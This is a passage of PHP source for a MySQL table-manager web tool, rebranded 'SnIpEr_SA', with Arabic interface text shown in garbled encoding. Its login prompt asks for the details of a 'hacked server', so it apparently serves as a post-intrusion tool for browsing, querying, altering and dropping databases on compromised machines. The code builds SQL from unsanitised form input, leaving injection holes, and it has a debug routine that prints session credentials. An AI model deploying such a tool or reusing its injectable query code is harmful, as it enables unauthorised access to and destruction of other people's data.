872	$fields = mysql_list_fields($dbname, $tablename);
873	$whr="where ";
874	$tok=explode(" ",$searchval);
875	for ($t =0; $t < count($tok); $t++){
876	for ( $c = 0; $c < $num; $c++){
877	$fn =mysql_field_name($fields, $c);
878	$whr .=" $fn like '%$tok[$t]%' or ";
879	}
880	}
881	$whr=trim(substr_replace($whr, " ", -3));
882	$query="Select * from $tablename $whr";
883	$result=exequery($query, $tablename, $dbname);
884	return $result;
885	}
886
887	}
888	//*******************GOTO buttons***********************
889	//provides a form and button.
890
891	function goto($tablename, $dbname, $action, $class, $name, $va ){
892	//Adds a button.
893
894	echo"<form action='$action' method='post' >\n";
895
896	if(! eregi('tablestart', $name)){
897	echo"<input type=hidden name=dbname value='$dbname' />\n";
898	echo"<input type=hidden name=tablename value='$tablename' />\n";
899	}
900	echo"<input class=$class type=submit value='$va' name='$name' />\n";
901	//echo"<input class=$class type=submit value='$action' name=$name>";
902	echo"</form>\n";
903
904	//echo"<a class=$class href=$action>$va</a>";
905	//}
906	}
907
908	//********************* ShowDB *********************************
909	function showdb(){
910	//function showdb($backuppath){
911
912	$link=connectmysql();
913	if ($link){
914	echo"<div class='db'>";
915	echo"<div class='cream'>\n";
916	echo"<h2 class=h >ÅäÔÇÁ ÞÇÚÏÉ ÌÏíÏÉ</h2>\n";
917
918	echo"<form name=cdb action='$action' method='post' >\n";
919	echo"ÃÓã ÇáÞÇÚÏÉ ÇáÌÏíÏÉ: <input type=text name=ndbname />\n";
920	echo"<br /><br /><input class=but type='submit' name='cndb' value='ÅäÔÇÁ ÞÇÚÏÉ ÌÏíÏÉ' />\n";
921	echo"</form><br />";
922	echo"</div>";
923	echo"<h2 class=h >ÞÇÆãå ÇáÞæÇÚÏ ÇáãÊæÝÑå</h2>\n";
924	//Restrict the database for users
925	$dbnamearray= dbrestrict();
926	showdbs($dbnamearray);
927	echo"</div>";
928	}
929
930	}
931
932	//******************** BuildWhr ****************************
933	//Builds the Where part of queries.
934
935	function buildwhr($pk, $pv){
936	$whr="";
937	$pn =count($pv);
938	for($t =0; $t < $pn; $t++){
939	$whr.="$pk[$t]='$pv[$t]'";
940	if($t < $pn-1){
941	$whr.=" and ";
942	}
943	}
944	if ($whr !=" "){
945	return $whr;
946	}else{
947	return false;
948	}
949	}
950	//*********************ADD Record ****************
951
952	function addrecord($tablename, $dbname, $array){
953	$result=exequery("Select * from $tablename", $tablename, $dbname);
954	//$result = @mysql_query( "Select * from $tablename" );
955
956	$flds = mysql_num_fields($result);
957	//$fields = mysql_list_fields($dbname, $tablename);
958	$qry=" ";
959	$query = "Insert into $tablename Values( ";
960	for ($x =0; $x < $flds; $x++){
961	//Multiple Select values for SET
962
963	if(is_array($array[$x])){
964	$mval="";
965	for($m=0; $m < count($array[$x]); $m++){
966	if($m+1 == count($array[$x])){
967	$mval.= AddSlashes($array[$x][$m]);
968
969	}else{
970	$mval.= AddSlashes($array[$x][$m]).",";
971	}
972	$fval = $mval;
973	}
974	}else{
975	$fval = AddSlashes($array[$x]);
976	}
977	$qry .= "'$fval'";
978	if ($x < $flds-1){
979	$qry.= ", ";
980	}
981	}
982	$query .= $qry.")";
983	// echo"qry: $qry";
984	$result=exequery($query, $tablename, $dbname);
985	if($result){
986	return $result;
987	}else{
988	return false;
989	}
990	}
991
992	//********************ADD Form ********************
993
994	function addform($tablename, $dbname){
995	//Display the field names and input boxes
996	echo"<form action='$action' method='post'>\n";
997	echo"<table border=0 width='100%' align='center'>\n";
998	echo"<tr class=head><td>Field Name</td><td>Type</td><td>Value</td></tr>\n";
999	$result=exequery("Select * from $tablename", $tablename, $dbname);
1000	//$result = @mysql_query( "Select * from $tablename" );
1001	$flds = mysql_num_fields($result);
1002	$fields = mysql_list_fields($dbname, $tablename);
1003	echo"<input type=hidden name=tablename value='$tablename' />\n";
1004	echo"<input type=hidden name='dbname' value='$dbname' />\n";
1005	echo"<tr>\n";
1006
1007	$mxlen = 80;//max width of the form fields.
1008	for($i=0; $i < $flds; $i++){
1009	$auto = "false";
1010	echo "<th>".mysql_field_name($fields, $i);
1011	$fieldname = mysql_field_name($fields, $i); // added
1012	$type = mysql_field_type($result, $i);
1013	$flen = mysql_field_len($result, $i);//length of the field
1014	$flagstring = mysql_field_flags ($result, $i);
1015	// Start of new code for set drop down
1016	$newsql = "show columns from $tablename like '%".$fieldname."'";
1017	$newresult = exequery($newsql, $tablename, $dbname);
1018	//mysql_query($newsql) or die ('I cannot get the query because: ' . mysql_error());
1019	$arr=mysql_fetch_array($newresult);
1020	// End of new code block for set drop down
1021	if (eregi("primary",$flagstring )){
1022	$type .= " PK ";
1023	}
1024	if(eregi("auto",$flagstring )){
1025	$type .= " auto_increment";
1026	$auto = "true";
1027	}
1028	if ($auto=="true"){
1029	echo"<td>$type</td><td><input type=text name='array[$i]' size='$flen' value=0 /></td></tr>\n";
1030	}elseif($flen > $mxlen){
1031	$rws= $flen/$mxlen;
1032	if($rws>10){
1033	$rws=10; //max length of textarea
1034	}
1035	echo"<td>$type</td><td><textarea name='array[$i]' rows=$rws cols=$mxlen></textarea></td></tr>\n";
1036	// Start of new code for set drop down
1037	}elseif (strncmp($arr[1],'set',3)==0 \|\| strncmp($arr[1],'enum',4)==0){ // We have a field type of set or enum
1038	$num=substr_count($arr[1],',') + 1; // count the number of entries
1039	$pos=strpos($arr[1],'(' ); //find the position of '('
1040	$newstring=substr($arr[1],$pos+1); // get rid of the '???('
1041	$snewstring=str_replace(')','',$newstring); // get rid of the last ')'
1042	$nnewstring=explode(',',$snewstring,$num); // stick into an array
1043	if(strncmp($arr[1],'set',3)==0 ){//Sets can have combinations of values
1044	echo "<td>Set (select one or more)</td>";
1045	echo"<td><select name='array[$i][]' size='3' multiple>";
1046	}else{//Enum one value only
1047	echo "<td>Enum</td>";
1048	echo"<td><select name='array[$i]'>";
1049	}
1050	for($y=0; $y<$num;$y++){
1051	echo"<option value=$nnewstring[$y]>$nnewstring[$y]";
1052	}
1053	echo"</select></td></tr>\n";
1054	// End of new code block for set drop down
1055	}else{
1056	echo"<td>$type</td><td><input type=text name='array[$i]' size='$flen' /></td></tr>\n";
1057	}
1058	}
1059	echo"<tr><td><input class=but type=submit name='addrec' value='Add Record' /></td>\n";
1060	echo"<td><input class=but type=reset name='reset' value='Reset Form' /></td>\n";
1061	echo"</tr>";
1062	echo"</table>\n";
1063	echo"</form>\n";
1064	}
1065
1066
1067	//*******************Edit Form *************
1068	function editform($tablename, $dbname, $result, $edit, $pk, $pv){
1069	$row=mysql_fetch_array($result);
1070	echo"<form action='$action' method=post>\n";
1071	echo"<table border=0 width ='100%' align='center'>\n";
1072
1073	$flds = mysql_num_fields($result);
1074	$fields = mysql_list_fields($dbname, $tablename);
1075	echo"<input type=hidden name=tablename value='$tablename' />\n";
1076
1077	echo"<input type=hidden name='dbname' value='$dbname' />\n";
1078	echo"<tr>";
1079	$mxlen = 80;//max width of the form fields
1080	for($i=0; $i < $flds; $i++){
1081	$fname=mysql_field_name($fields, $i);
1082	echo "<th>$fname";
1083	$flen = mysql_field_len($result, $i);//length of the field
1084	$nslash = StripSlashes($row[$i]);
1085	// Start of new code for set drop down
1086	$newsql = "show columns from $tablename like '%".$fname."'";
1087	$newresult = exequery($newsql, $tablename, $dbname);
1088	$arr=mysql_fetch_array($newresult);
1089	// End of new code block for set drop down
1090
1091	if($flen > $mxlen){
1092	$rws= $flen/$mxlen;
1093	if($rws>10){
1094	$rws=10; //max length of textarea
1095	}
1096	echo"<td><textarea name='array[$i]' rows=$rws cols=$mxlen>$nslash</textarea></td></tr>\n";
1097	// Start of new code for set drop down
1098	}elseif (strncmp($arr[1],'set',3)==0 \|\| strncmp($arr[1],'enum',4)==0){ // We have a field type of set or enum
1099	$num=substr_count($arr[1],',') + 1; // count the number of entries
1100	$pos=strpos($arr[1],'(' ); //find the position of '('
1101	$newstring=substr($arr[1],$pos+1); // get rid of the '???('
1102	$snewstring=str_replace(')','',$newstring); // get rid of the last ')'
1103	$nnewstring=explode(',',$snewstring,$num); // stick into an array
1104	if(strncmp($arr[1],'set',3)==0 ){//Sets can have combinations of values
1105	echo"<td><select name='array[$i][]' multiple size='3'>";
1106	}else{//Enum one value only
1107	echo"<td><select name='array[$i]'>";
1108	}
1109	$nsel=explode(",",$nslash);
1110	for($y=0; $y<$num;$y++){
1111	//geteach value 'a,b,c'
1112	$sel="";
1113	for($e=0; $e<count($nsel);$e++){
1114	if($nnewstring[$y]=="'".$nsel[$e]."'"){
1115	$sel="selected";
1116	}
1117	}
1118	echo"<option value=$nnewstring[$y] $sel>$nnewstring[$y]";
1119	}
1120	echo"</select></td></tr>\n";
1121	// End of new code block for set drop down
1122
1123
1124	}else{
1125	echo"<td><input type=text name='array[$i]' size='$flen' value='$nslash' /></td></tr>\n";
1126	}
1127	for($f =0; $f< count($pk);$f++){
1128	echo"<input type=hidden name=pk[$f] value='$pk[$f]' />";
1129	echo"<input type=hidden name=pv[$f] value='$pv[$f]' />\n";
1130	}
1131	}
1132	echo"<tr><td><input class=but type=submit name='editrec' value='Update' /></td>\n";
1133	echo"<td><input class=but type=reset name='reset' value='Reset Form' /></td>\n";
1134	echo"</tr>";
1135	echo"</table>\n";
1136	echo"</form>\n";
1137	}
1138	//**********************Edit Record***********************
1139	function editrec($dbname, $tablename, $pk, $pv, $array){
1140
1141	//$result = @mysql_query( "Select * from $tablename" );
1142	$result = exequery("Select * from $tablename", $tablename, $dbname);
1143	$flds = mysql_num_fields($result);
1144	$fields = mysql_list_fields($dbname, $tablename);
1145
1146	//Build Query
1147	$qry="";
1148	$query = "UPDATE $tablename set ";
1149	for ($x =0; $x < $flds; $x++){
1150	$fie = mysql_field_name($fields, $x );
1151	// SET and ENUM
1152	if(is_array($array[$x])){
1153	$mval="";
1154	for($m=0; $m < count($array[$x]); $m++){
1155	if($m+1 == count($array[$x])){
1156	$mval.= AddSlashes($array[$x][$m]);
1157	}else{
1158	$mval.= AddSlashes($array[$x][$m]).",";
1159	}
1160	$fval = $mval;
1161	}
1162	}else{
1163	$fval = AddSlashes($array[$x]);
1164	}
1165	//**************************
1166	//$fval = AddSlashes($array[$x]);
1167	$qry .= "$fie = '$fval'";
1168	if ($x < $flds-1){
1169	$qry.= ", ";
1170	}
1171	}
1172	$whr = buildwhr( $pk, $pv);
1173	$whr =StripSlashes($whr);
1174	$query .= "$qry";
1175	$query .= " where $whr";
1176
1177	$result=exequery($query, $tablename, $dbname);
1178	if($result){
1179	return $result;
1180	}else{
1181	return false;
1182	}
1183	}
1184	//**************** Number of Primary Keys *********************
1185	function numpk($result){
1186	$z =0;
1187	for ($i = 0; $i < $flds; $i++) {
1188	//Find the primary key
1189	$flagstring = mysql_field_flags ($result, $i);
1190	if(eregi("primary",$flagstring )){
1191	$z++;
1192	}
1193	}
1194	return $z;
1195	}
1196	//******************Size field***************
1197	function fieldformsize($ft, $i, $l){
1198	$ft= trim(strtoupper($ft));
1199	if($ft =="DATE" \|\| $ft=="TIME" \|\| $ft== "DATETIME" ){
1200	}elseif( $ft=="TINYTEXT" \|\| $ft=="BLOB" \|\| $ft=="TEXT" \|\| $ft =="MEDIUMBLOB"){
1201	echo"<input type=hidden name='leng[$i]' value=$l>";
1202	}elseif($ft=="MEDIUMTEXT" \|\| $ft=="LONGBLOB"\|\| $ft=="LONGTEXT" \|\| $ft=="TINYBLOB"){
1203	echo"<input type=hidden name='leng[$i]' value=$l>";
1204	}elseif($ft=="INT" \|\| $ft=="TINYINT"\|\| $ft=="SMALLINT"\|\| $ft=="MEDIUMINT"\|\| $ft=="BIGINT" \|\| $ft=="INTEGER"){
1205	echo"<input type=text name='leng[$i]' size=5 value=$l>";
1206	}elseif($ft=="YEAR" ){
1207	echo"<select name='leng[$i]'>";
1208	echo"<option value='4'>4";
1209	echo"<option value='2'>2";
1210	echo"</select>\n";
1211	}elseif($ft=="SET"\|\| $ft=="ENUM"){
1212	echo"<input type=text name='leng[$i]' title='values eg \"a\", \"b\", \"c\"' value='' />";
1213	}else{
1214	echo"<input type=text name='leng[$i]' size=5 value=$l />\n";
1215	}
1216	}
1217
1218	//****************************Display Row ****************************
1219	function displayrow($dbname, $tbl, $pk, $pkfield, $cpk, $row, $flds){
1220	$pkfs="";
1221	$hv="";
1222	$hf="";
1223
1224	if($cpk >0 && !empty($pkfield)){
1225	for($a = 0; $a < $cpk; $a++){
1226	$fieldn = $pkfield[$a];
1227	$hf .= "<input type=hidden name=pk[$a] value='$pkfield[$a]' />";
1228	$hv .= "<input type=hidden name=pv[$a] value='$row[$fieldn]' />";
1229	}
1230	}else{ //No Primary Key so use all fields
1231	$fields = mysql_list_fields($dbname, $tbl);
1232	for($b = 0; $b < $flds; $b++){
1233	$fie = mysql_field_name($fields, $b );
1234	$hf .= "<input type=hidden name=pk[$b] value='$fie' />";
1235	$hv .= "<input type=hidden name=pv[$b] value='$row[$b]' />";
1236	}
1237	}
1238	echo"<tr>\n";
1239	//edit Record
1240	echo"<td><form action='$action' method=post>\n";
1241	echo"<input type=hidden name=dbname value='$dbname' />\n";
1242	echo"<input type=hidden name=tablename value='$tbl' />\n";
1243	echo"<input type=hidden name=npkeys value='$cpk' />\n";
1244	echo"$hf";
1245	echo"$hv";
1246	echo"<input class=sml type=submit name=edit value='Edit Record' />\n";
1247	echo"</form></td>\n";
1248
1249	//Delete record
1250	echo"<td><form action='$action' method=post>\n";
1251	echo"<input type=hidden name=dbname value='$dbname' />\n";
1252	echo"<input type=hidden name=tablename value='$tbl' />\n";
1253	echo"<input type=hidden name=num value='$cpk' />\n";
1254	echo"$hf";
1255	echo"$hv";
1256	echo"<input class=smldel type=submit name=delete value='Delete Record' />\n";
1257	echo"</form></td>";
1258
1259	//Display all the columns.
1260	for($col = 0; $col < $flds; $col ++){
1261	$nslash = StripSlashes($row[$col]);
1262	echo"<td>$nslash</td>";
1263	}
1264	echo"</tr>";
1265
1266	}
1267	//*********************Remove Array Copy******************************
1268	//removes copies from an array $x.
1269
1270	function removearraycopy($x){
1271	$leng= count($x);
1272	sort($x);
1273	$farr=array();
1274
1275	for ($i =0; $i < $leng; $i++){
1276	$flag=false;
1277	for ($s =0; $s < count($farr); $s++){
1278	if($x[$i]==$farr[$s]){
1279	$flag=true;
1280	}
1281	}
1282	if ($flag == false){
1283	$farr[count($farr)] = $x[$i];
1284	}
1285	}
1286	return $farr;
1287	}
1288	//*********************<< page position >>******************************
1289	function whichpage($num_rows, $pagemax, $pg, $tablename, $searchval){
1290	$pgs = $num_rows/$pagemax;
1291	$pgs=ceil($pgs);
1292	//round up the number of pages.
1293	echo"<form action='$action' id='recspage' method='post' name='recspage'>\n";
1294	echo"Total number of records $num_rows, displayed on $pgs pages of \n";
1295	echo"<input type='text' name='pagemax' value='$pagemax' size='4' onchange='javascript:this.form.submit();' title='Type the number records to display on a page then click outside the box' /> \n";
1296	echo"<input type='hidden' name='searchval' value='$searchval' />\n";
1297	echo"<input type='hidden' name='tablename' value='$tablename' />\n";
1298	echo"records per page.</form> \n";
1299	$pagescrol="";
1300	$sval="";
1301	if($pgs >1){
1302	$pagescrol="<div class='pagecount'>\n";
1303	$nxt=$pg+1;
1304	$bk=$pg-1;
1305	$lst=$pgs;
1306	$end=$lst-1;
1307	$showp=$pg+1;
1308	if($searchval !=""){
1309	$sval="&searchval=$searchval";
1310	}
1311	$pagescrol .= "<form name='pages' id='pages' action='$action' method='get'>\n";
1312	if($pg>=1){
1313	$pagescrol .= " <a href='$action?tablename=$tablename&pg=0$sval' title='To first page'> 1 :<< </a> \n";
1314	$pagescrol .= " <a href=''action'?tablename=$tablename&pg=$bk$sval' title='Back one page'> < </a> \n";
1315	}
1316	$pagescrol .= "<input type='text' name='pg' value='$showp' size='4' onchange='javascript:this.form.submit();' title='Type a page number then click outside the box' />\n";
1317	$pagescrol .= "<input type='hidden' name='pback' value='true' />\n";
1318	$pagescrol .= "<input type='hidden' name='searchval' value='$searchval' />\n";
1319	$pagescrol .= "<input type='hidden' name='tablename' value='$tablename' />\n";
1320
1321	if($showp < $lst){
1322	$pagescrol .= " <a href=''action'?tablename=$tablename&pg=$nxt$sval' title='Next page'> > </a> \n";
1323	$pagescrol .= " <a href=''action'?tablename=$tablename&pg=$end$sval' title='To Last page'> >>: $lst</a> \n";
1324	}
1325	$pagescrol .= "</form>\n";
1326	$pagescrol.="</div>\n";
1327	}
1328	return $pagescrol;
1329	}
1330
1331	//***********Display Footer***********************
1332	//Please don't remove or change.
1333	function display_foot(){
1334
1335	echo"<div class='foot'>Version $version © ".date('Y')." <a style='text-decoration:none;' target='_blank' href='http://www.SnIpEr-SA.com'>SnIpEr_SA</a></div>";
1336
1337	}
1338	//***********My Size***********************
1339	//Returns the size of a table or database
1340	function mysize($dbname, $tablename){
1341	$like="";
1342	$total="";
1343	$t=0;
1344	if($tablename !=""){
1345	$like=" like '$tablename'";
1346	}
1347	$sql= "SHOW TABLE STATUS FROM $dbname $like";
1348	//$result = mysql_query($sql);
1349	$result=exequery($sql, $tablename, $dbname);
1350	if($result){
1351
1352	while($rec = mysql_fetch_array($result)){
1353	$t+=($rec['Data_length'] + $rec['Index_length']);
1354	}
1355	$total ="<span class='bytes'>$t bytes</span>";
1356	}else{
1357	$total="Unknowen";
1358	}
1359	return($total);
1360	}
1361
1362
1363	//**************************************
1364	//DEBUG to show all being passed to the page
1365	function showpassingvars(){
1366	echo"Get: ";
1367	foreach($_GET as $pram=>$value){
1368	echo"$pram: $value, ";
1369	}
1370	echo"<br>Post: ";
1371	foreach($_POST as $pram=>$value){
1372	echo"$pram: $value, ";
1373	}
1374	echo"<br>Session: ";
1375	foreach($_SESSION as $pram=>$value){
1376	echo"$pram: $value, ";
1377	}
1378	}
1379	echo"<html>\n";
1380	echo"<meta http-equiv='Content-Type' content='text/html; charset=windows-1256'>\n";
1381	echo"<head>\n";
1382	echo"<title>ÓßÑÈÊ ÇáÇÊÕÇá ÈÞæÇÚÏ ÇáÈíÇäÇÊ</title>\n";
1383	echo"<STYLE>
1384
1385	BODY
1386	{
1387	SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
1388	}
1389
1390	tr {
1391	BORDER-RIGHT: #cccccc ;
1392	BORDER-TOP: #cccccc ;
1393	BORDER-LEFT: #cccccc ;
1394	BORDER-BOTTOM: #cccccc ;
1395	color: #ffffff;
1396	}
1397	td {
1398	BORDER-RIGHT: #cccccc ;
1399	BORDER-TOP: #cccccc ;
1400	BORDER-LEFT: #cccccc ;
1401	BORDER-BOTTOM: #cccccc ;
1402	color: #cccccc;
1403	}
1404	.table1 {
1405	BORDER: 1;
1406	BACKGROUND-COLOR: #000000;
1407	color: #333333;
1408	}
1409	.td1 {
1410	BORDER: 1;
1411	font: 7pt tahoma;
1412	color: #ffffff;
1413	}
1414	.tr1 {
1415	BORDER: 1;
1416	color: #cccccc;
1417	}
1418	table {
1419	BORDER: #eeeeee outset;
1420	BACKGROUND-COLOR: #000000;
1421	color: #cccccc;
1422	}
1423	input {
1424	BORDER-RIGHT: #990000 1 solid;
1425	BORDER-TOP: #990000 1 solid;
1426	BORDER-LEFT: #990000 1 solid;
1427	BORDER-BOTTOM: #990000 1 solid;
1428	BACKGROUND-COLOR: #333333;
1429	font: 9pt tahoma;
1430	color: #ffffff;
1431	}
1432	select {
1433	BORDER-RIGHT: #ffffff 1 solid;
1434	BORDER-TOP: #999999 1 solid;
1435	BORDER-LEFT: #999999 1 solid;
1436	BORDER-BOTTOM: #ffffff 1 solid;
1437	BACKGROUND-COLOR: #000000;
1438	font: 9pt tahoma;
1439	color: #CCCCCC;;
1440	}
1441	submit {
1442	BORDER: buttonhighlight 1 outset;
1443	BACKGROUND-COLOR: #272727;
1444	width: 40%;
1445	color: #cccccc;
1446	}
1447	textarea {
1448	BORDER-RIGHT: #ffffff 1 solid;
1449	BORDER-TOP: #999999 1 solid;
1450	BORDER-LEFT: #999999 1 solid;
1451	BORDER-BOTTOM: #ffffff 1 solid;
1452	BACKGROUND-COLOR: #333333;
1453	font: Fixedsys bold;
1454	color: #ffffff;
1455	}
1456	BODY {
1457	margin: 1;
1458	color: #cccccc;
1459	background-color: #000000;
1460	}
1461	A:link {COLOR:red; TEXT-DECORATION: none}
1462	A:visited { COLOR:red; TEXT-DECORATION: none}
1463	A:active {COLOR:red; TEXT-DECORATION: none}
1464	A:hover {color:blue;TEXT-DECORATION: none}
1465
1466	</STYLE>\n";
1467	echo"<meta http-equiv='Content-Type' content='text/html charset=windows-1256'>";
1468	echo"<title>ÓßÑÈÊ ÇáÇÊÕÇá ÈÞæÇÚÏ ÇáÈíÇäÇÊ</title>\n";
1469	echo"<meta name='author' content='Tony Aslett'>";
1470	echo"<meta name='title' content='PHP:MySQL Table Manager'>";
1471	echo"<meta name='description' content='Table Manager for MySQL Database'>";
1472	echo"<link rel='stylesheet' href='tmgrstyles.css' type='text/css'>\n";
1473	echo"</head>\n";
1474	echo"<body>\n";
1475
1476	$showall=true;
1477	echo"<h2 class=h >ÓßÑÈÊ ÇáÇÊÕÇá ÈÞæÇÚÏ ÇáÈíÇäÇÊ</h2>\n";
1478	//***************** Session Logon *********************
1479	if(isset($_POST['logout'])){
1480
1481	$_POST['dbname']="";
1482	session_unset();
1483	session_destroy();
1484	}
1485	if(isset($_POST['userid']) && isset($_POST['pword1'])){
1486	$_SESSION['user'] = $_POST['userid'];
1487	$_SESSION['password'] = $_POST['pword1'];
1488	}
1489
1490	if (!isset($_SESSION['user']) \|\| !isset($_SESSION['password'])){
1491	echo"<div align=center>";
1492	echo"<h2>ÇÏÎá ÈíÇäÇÊ ÇáÓíÑÝÑ ÇáãÎÊÑÞ</h2>\n";
1493	If(!isset($dbnamearray)){
1494	$dbnamearray="";
1495	}
1496	show_login($dbnamearray);
1497	echo"</div>";
1498	}else{
1499	//show logout option.
1500	echo"<div align=right>";
1501	endsess();
1502	echo"</div>";
1503	}
1504	//*****dbname
1505	if(isset($_POST['dbname'])){
1506	$dbname=$_POST['dbname'];
1507	$_SESSION['dbname']= $_POST['dbname'];
1508	}
1509	//***** Host
1510	if(isset($_POST['host'])){
1511	$host=$_POST['host'];
1512	$_SESSION['host']=$_POST['host'];
1513	}
1514	//******set tablename
1515	if(isset($_GET['tablename']) ){
1516	$tablename=$_GET['tablename'];
1517	}elseif(isset($_POST['tablename'])){
1518	$tablename=$_POST['tablename'];
1519	}
1520	//********** pagemax
1521	if(isset($_POST['pagemax'])){ //&& is_int($_POST['pagemax'])){
1522	$isnum=true;
1523	for($o=0; $o<count($_POST['pagemax']); $o++){
1524	if($_POST['pagemax'][$o]>9){
1525	$isnum=false;
1526	}
1527	}
1528	if($_POST['pagemax']>0 && $isnum){
1529	$_SESSION['pagemax']=$_POST['pagemax'];
1530	}
1531	}
1532	if(isset($_SESSION['pagemax'])){
1533	$pagemax=$_SESSION['pagemax'];
1534	}
1535	//****** create a new Database **********
1536	if(isset($_POST['cndb'])){
1537	connectmysql();
1538	$sql="create database $_POST[ndbname]";
1539	$result=exequery($sql, " ", $_POST['ndbname']);
1540	if ($result){
1541	$_SESSION['dbname'] = $_POST['ndbname'];
1542	$sql="Use $_POST[ndbname]";
1543	$result=exequery($sql, " ", $_POST['ndbname']);
1544	if($result){
1545	echo"<h2>ÞÇÚÏÉ ÌÏíÏÉ $_SESSION[dbname] </h2>\n";
1546	}
1547	}
1548	}
1549
1550	//*********************************************
1551	if (! isset($_SESSION['dbname']) && ! isset($dbnamearray) && ! isset($_POST['dbname']) && isset($_SESSION['user'])){ //*********post
1552	//Databse names
1553	showdb();
1554	}
1555	//********************** Choose DB ***********
1556	if(isset($_POST['dbname']) && $_POST['dbname']==""){
1557	showdb();
1558	}
1559
1560	//**********
1561	if (isset($_SESSION['dbname']) \|\| isset($_POST['dbna']) \|\| isset($_POST['dbname'])){
1562	//*************************************
1563	//connection
1564
1565	if (isset($_SESSION['dbname'])){
1566	$dbsetname = $_SESSION['dbname'];
1567	}elseif(isset($_POST['dbname'])){
1568	$dbsetname = $_POST['dbname'];
1569	$_SESSION['dbname'] = $_POST['dbname'];
1570	}else{
1571	$dbsetname = $_POST['dbna'];
1572	$_SESSION['dbname'] = $_POST['dbna'];
1573	}
1574	}
1575	//*************************** we have a DB set
1576	if(isset($dbsetname) && $dbsetname!=""){
1577	$link= connectmysql();
1578	//echo"DBS: $dbsetname";
1579	$conn = connectdb($dbsetname, $link);
1580
1581	//********* Drop Table ************
1582	if(isset($_POST['deltable'])){
1583	$showall=false;
1584	$tablename=$_POST['tablename'];
1585	echo"<h1>!!! ÊÍÐíÑ !!! <br>ÇäÊ ÊÍÇæá ãÓÍ åÐÇ ÇáÌÏæá $tablename<br>";
1586	echo"åá ÇäÊ ãÊÇßÏ ãä ÇáÞíÇã ÈÇáÚãáíå¿?</h1>\n";
1587	$va="Drop $tablename";
1588	goto($tablename, $dbname,$action, 'del', 'droptab', $va );
1589	}
1590	if(isset($_POST['droptab'])){
1591	$tablename=$_POST['tablename'];
1592	$dsql = "drop table $tablename";
1593	$result=exequery($dsql, $tablename, $dbname);
1594	unset($tablename); //="false";
1595	unset($_POST['tablename']);
1596	}
1597	//***************Write Your Own Query ***************
1598	if(isset($_POST['wyoq'])){ //post
1599	$value="ÇáæÇÌåå ÇáÑÆíÓíå ááÓßÑÈÊ";
1600	goto($tablename, $dbname, $action, 'but', 'start', $value );
1601	echo"<form method='post'>\n";
1602	echo"<input type='hidden' name='dbname' value=$dbname>\n";
1603	//echo"<input type=text name='wyqota' width='500px' style='overflow-x:visible;'>\n";
1604
1605	echo"<textarea name='wyoqta' cols='60' rows='5' style='overflow-y:visible'></textarea>\n";
1606
1607	echo"<br><input class=but type=submit name='runquery' value='Execute Query'>\n";
1608	echo"</form><br>\n";
1609	}
1610
1611	if(isset($_POST['runquery'])){
1612	$wyoqta = StripSlashes($_POST['wyoqta']);
1613	$result=exequery($wyoqta, " ", " ");
1614
1615	if(@mysql_num_rows($result) >0){
1616	$numrows=mysql_num_rows($result);
1617	$flds=mysql_num_fields($result);
1618	echo"<table>";
1619	for($r=0; $r < $numrows; $r++){
1620	echo"<tr>";
1621	$row=mysql_fetch_array($result);
1622	for($col = 0; $col < $flds; $col ++){
1623	$nslash = StripSlashes($row[$col]);
1624	echo"<td>$nslash</td>";
1625	}
1626	echo"</tr>";
1627	}
1628	echo"</table>";
1629	}elseif (mysql_affected_rows()){
1630	echo" Number of Rows affected: ".mysql_affected_rows();
1631	}else{
1632	echo" Nothing returned from the query.";
1633	}
1634	}
1635	// **************List Tables*************************
1636
1637	if( ! isset($tablename) \|\| $tablename==" " ){
1638	$dbname=$_SESSION['dbname'];
1639	$result = mysql_list_tables($_SESSION['dbname']);
1640	$numtab = mysql_num_rows ($result);
1641	if($numtab == 1){
1642	$_SESSION['tablename'] =mysql_tablename($result, 0);
1643	}
1644
1645	//*************** Buttons ****************************
1646	if (isset($_POST['runquery'])){
1647	$dbname=$_SESSION['dbname'];
1648	$value="$dbname Start"; //Table Manager Start
1649	goto("", $_SESSION['dbname'], $action, 'but', 'tablestart', $value );
1650
1651	}elseif (! isset($_POST['wyoq']) && ! isset($_POST['runquery'])){ //write your own query.
1652	echo"<table width=40% border=0 align='left' >\n";
1653	echo"<tr><td>";
1654
1655	$va="ÅäÔÇÁ ÌÏæá ÌÏíÏ";
1656	goto("", $_SESSION['dbname'], "create.php", 'but', 'create', $va );
1657	// echo"<a href=create.php class='crt'>Create new Table</a>\n";
1658	echo"</td><td>";
1659
1660	$value="ÇáæÇÌåå ÇáÑÆíÓíå"; //Choose DB
1661	goto("", "", $action, 'but', 'db', $value );
1662	echo"</td>\n";
1663
1664	$value="Write Your Own Query";
1665	goto(" ", $_SESSION['dbname'], $action, 'but', 'wyoq', $value );
1666
1667	echo"</td></tr>";
1668	echo"</table><br><br><br><br><div style='clear:both;'></div>";
1669
1670	echo"<table width=100% border=0 align='center' >\n";
1671	for ($i =0; $i < $numtab; $i++) {
1672
1673	$tb_names[$i] = mysql_tablename($result, $i);
1674	echo"<tr class='frow'><td align='center'>\n";
1675
1676	$va="ÚÑÖ ÌÏæá * $tb_names[$i]";
1677	goto($tb_names[$i], $_SESSION['dbname'],$action, 'but', $tb_names[$i], $va );
1678	echo"</td><td align='center' valign='middle'>\n";
1679
1680	$va="ãÓÍ ÌÏæá $tb_names[$i]";
1681	goto($tb_names[$i], $_SESSION['dbname'],$action, 'del', 'deltable', $va );
1682	echo"</td><td align='center' valign='middle'>\n";
1683
1684	$va="Alter Table $tb_names[$i]";
1685	goto($tb_names[$i], $_SESSION['dbname'],'alter.php', 'but', 'altertable', $va );
1686	echo"</td><td align='center' valign='middle'>\n";
1687
1688	searchtableform($tb_names[$i], $_SESSION['dbname']);
1689	echo"</td><td>";
1690	//Table size in bytes
1691	echo mysize($_SESSION['dbname'],$tb_names[$i]);
1692
1693	echo"</td></tr>\n";
1694	}//for
1695	echo"</table>\n";
1696	}
1697
1698	}else{ //tablename is set
1699	//*************** menu ***************************************
1700	echo"<table><tr class='frow'><td>\n";
1701	$value="$_SESSION[dbname] Start"; //Ex Table Manager Start
1702	goto($tablename, $_SESSION['dbname'], $action, 'but', 'tablestart', $value );
1703	echo"</td>\n";
1704
1705	echo"<td>\n";
1706	$value="ÇáæÇÌåå ÇáÑÆíÓíå"; //Choose DB
1707	goto("", "", $action, 'but', 'start', $value );
1708	echo"</td>\n";
1709
